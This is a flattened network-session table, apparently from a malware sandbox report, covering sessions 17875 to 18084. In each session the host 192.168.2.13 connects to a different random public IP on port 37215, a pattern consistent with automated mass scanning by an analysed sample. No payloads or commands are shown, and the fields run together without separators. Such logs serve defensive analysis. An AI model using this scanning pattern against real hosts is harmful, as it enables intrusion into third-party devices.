                                                  17875192.168.2.1359888197.126.70.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17876192.168.2.135759041.148.250.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17877192.168.2.1348152197.69.26.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17878192.168.2.135422653.225.15.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17879192.168.2.1340442197.7.11.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17880192.168.2.1340410197.224.131.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17881192.168.2.1336506157.27.223.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17882192.168.2.1332976141.125.255.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17883192.168.2.1345610157.109.0.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17884192.168.2.134177841.249.76.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17885192.168.2.1358972197.88.168.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17886192.168.2.1334380218.243.9.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17887192.168.2.133627641.68.226.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17888192.168.2.1342970169.224.138.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17889192.168.2.134772841.242.46.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17890192.168.2.1342208197.145.28.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17891192.168.2.1345252197.45.205.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17892192.168.2.1355792157.71.174.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17893192.168.2.1342672197.54.110.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17894192.168.2.1357052197.208.198.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17895192.168.2.1345700157.160.181.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17896192.168.2.1360040182.207.110.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17897192.168.2.135627241.165.245.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17898192.168.2.1340172157.18.15.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17899192.168.2.134788078.210.74.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17900192.168.2.1335958197.138.112.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17901192.168.2.1333320157.200.176.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17902192.168.2.1341674197.71.191.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17903192.168.2.1356688197.194.41.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17904192.168.2.133758213.8.72.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17905192.168.2.1352684212.77.205.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17906192.168.2.134791641.148.154.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17907192.168.2.1340328197.144.155.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17908192.168.2.135005235.97.169.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17909192.168.2.1341322197.102.177.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17910192.168.2.1350858142.11.238.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17911192.168.2.1355306157.42.222.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17912192.168.2.1337100157.231.146.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17913192.168.2.1355958197.18.49.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17914192.168.2.134149431.94.101.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17915192.168.2.1334562157.55.80.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17916192.168.2.1341416197.41.251.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17917192.168.2.1351872128.8.200.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17918192.168.2.135230072.133.181.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17919192.168.2.1353952157.90.69.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17920192.168.2.133946846.122.140.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17921192.168.2.1359406197.166.116.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17922192.168.2.1350282197.213.63.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17923192.168.2.134766841.45.80.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17924192.168.2.134131841.146.25.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17925192.168.2.134883841.237.102.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17926192.168.2.134439841.239.232.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17927192.168.2.133787697.39.218.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17928192.168.2.1358334197.187.107.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17929192.168.2.1357066157.41.47.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17930192.168.2.1350340158.187.152.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17931192.168.2.1334588133.254.125.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17932192.168.2.1349990157.140.188.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17933192.168.2.1355982157.169.81.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17934192.168.2.1349162197.16.169.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17935192.168.2.1349292157.245.136.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17936192.168.2.1335230166.50.180.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17937192.168.2.135341087.195.21.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17938192.168.2.134020841.147.178.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17939192.168.2.1356330211.63.221.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17940192.168.2.1348156216.56.93.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17941192.168.2.134751834.152.206.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17942192.168.2.1350674197.110.52.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17943192.168.2.1350622160.40.9.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17944192.168.2.135320841.152.210.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17945192.168.2.13367884.32.125.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17946192.168.2.1346052197.10.16.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17947192.168.2.1336030169.239.195.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17948192.168.2.1348560197.207.30.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17949192.168.2.1339332157.76.116.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17950192.168.2.136075641.118.227.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17951192.168.2.1357394161.44.130.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17952192.168.2.133337241.29.240.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17953192.168.2.13605324.98.242.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17954192.168.2.134512641.247.237.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17955192.168.2.1357442193.23.216.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17956192.168.2.1334408197.173.96.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17957192.168.2.134570041.12.106.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17958192.168.2.1334308197.189.56.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17959192.168.2.1347974197.36.135.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17960192.168.2.1338308157.77.116.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17961192.168.2.1349234197.150.139.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17962192.168.2.1349750157.224.177.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17963192.168.2.1341296157.26.140.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17964192.168.2.1353882141.139.167.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17965192.168.2.1337290191.130.22.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17966192.168.2.1347594155.32.96.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17967192.168.2.1358678157.187.171.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17968192.168.2.1344568157.139.58.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17969192.168.2.1333110197.46.69.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17970192.168.2.135428841.8.149.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17971192.168.2.1347198172.57.26.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17972192.168.2.1338392157.63.44.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17973192.168.2.135397241.102.138.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17974192.168.2.134949879.186.61.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17975192.168.2.133425241.126.158.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17976192.168.2.1350576197.244.93.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17977192.168.2.1348374197.120.158.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17978192.168.2.133721641.170.25.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17979192.168.2.1333916157.122.237.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17980192.168.2.133470675.101.237.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17981192.168.2.1352662197.209.185.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17982192.168.2.1354710197.162.102.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17983192.168.2.1342054197.129.60.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17984192.168.2.134858641.155.230.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17985192.168.2.1355500157.18.137.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17986192.168.2.136074641.136.172.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17987192.168.2.136050241.165.164.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17988192.168.2.1336400221.98.84.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17989192.168.2.1352704157.195.61.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17990192.168.2.1333738156.41.143.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17991192.168.2.135502041.218.75.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17992192.168.2.1354854205.70.53.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17993192.168.2.1357944157.127.170.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17994192.168.2.1343116197.224.147.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17995192.168.2.1344910157.148.172.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17996192.168.2.1354588203.67.96.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17997192.168.2.136042841.132.21.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17998192.168.2.1339568157.209.133.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17999192.168.2.134181441.112.148.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18000192.168.2.135997441.72.54.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18001192.168.2.1335654197.53.94.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18002192.168.2.133625641.229.170.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18003192.168.2.1348878157.194.77.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18004192.168.2.1357824197.85.103.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18005192.168.2.1351978157.211.173.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18006192.168.2.1336430197.206.254.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18007192.168.2.1357120157.55.120.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18008192.168.2.1346438197.118.223.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18009192.168.2.1348672197.168.231.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18010192.168.2.133732074.217.139.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18011192.168.2.1339474197.80.236.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18012192.168.2.1340198197.243.192.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18013192.168.2.1342158197.213.94.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18014192.168.2.1358084197.173.92.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18015192.168.2.1347692197.37.158.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18016192.168.2.1339778157.204.163.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18017192.168.2.1360684168.3.200.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18018192.168.2.134463441.14.60.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18019192.168.2.134462241.118.141.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18020192.168.2.133617041.73.99.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18021192.168.2.1340462161.183.78.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18022192.168.2.135099841.44.174.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18023192.168.2.1340662197.196.71.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18024192.168.2.1354860197.28.232.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18025192.168.2.1355482197.112.120.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18026192.168.2.1351506197.130.109.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18027192.168.2.1352706157.174.162.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18028192.168.2.1357620157.140.97.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18029192.168.2.133383641.173.251.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18030192.168.2.1352516157.3.248.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18031192.168.2.133920041.59.1.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18032192.168.2.1340894197.67.9.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18033192.168.2.1353178197.71.237.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18034192.168.2.1359522173.151.214.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18035192.168.2.1358264157.36.185.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18036192.168.2.1351738157.236.56.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18037192.168.2.1357110218.155.75.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18038192.168.2.1334294197.49.185.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18039192.168.2.1341600157.207.75.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18040192.168.2.1357652197.175.83.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18041192.168.2.1337210172.141.122.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18042192.168.2.1347896197.222.141.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18043192.168.2.135500641.187.89.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18044192.168.2.133579670.30.3.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18045192.168.2.1356786157.14.233.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18046192.168.2.1349460203.24.213.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18047192.168.2.1337450157.152.48.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18048192.168.2.1337170182.228.93.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18049192.168.2.133856488.128.42.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18050192.168.2.135043881.188.237.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18051192.168.2.1335012197.128.13.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18052192.168.2.135918859.168.41.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18053192.168.2.1360124197.129.14.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18054192.168.2.1358892197.176.46.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18055192.168.2.1337320197.87.27.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18056192.168.2.1347638197.101.5.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18057192.168.2.1332898196.38.158.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18058192.168.2.1336630157.131.165.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18059192.168.2.1341134157.192.82.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18060192.168.2.1352992197.83.209.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18061192.168.2.134493441.83.48.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18062192.168.2.1337872157.212.185.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18063192.168.2.135345041.14.128.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18064192.168.2.1353770157.180.70.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18065192.168.2.1353868104.188.102.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18066192.168.2.1350394197.52.48.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18067192.168.2.1340032205.124.18.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18068192.168.2.1350698157.99.29.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18069192.168.2.135273092.10.238.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18070192.168.2.135652641.80.103.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18071192.168.2.1339136197.71.124.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18072192.168.2.1339954129.121.156.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18073192.168.2.135862841.247.35.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18074192.168.2.135567041.199.143.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18075192.168.2.1346920197.250.250.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18076192.168.2.1357092157.169.227.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18077192.168.2.135750841.234.186.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18078192.168.2.1340280199.214.194.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18079192.168.2.134735880.181.200.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18080192.168.2.1350428197.210.232.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18081192.168.2.1358210157.107.83.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18082192.168.2.135307241.129.90.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18083192.168.2.1358092162.10.246.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18084192.168.2.134267041.11.183.3537215
